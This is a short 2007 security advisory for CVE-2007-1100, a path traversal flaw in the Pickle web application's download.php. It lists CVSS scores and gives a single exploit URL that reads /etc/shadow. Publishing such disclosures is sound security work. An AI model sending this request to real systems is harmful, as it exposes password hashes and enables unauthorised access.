pickle download local file

Published
Credit
Risk
2007.02.28
laurent gaffié
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-1100
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.8/10
6.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
None
None

download local file :
/Pickle/src/download.php?img=1&file=../../../../../../../../../../../../
../etc/shadow&rotation=0&img=0

regards laurent gaffié


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com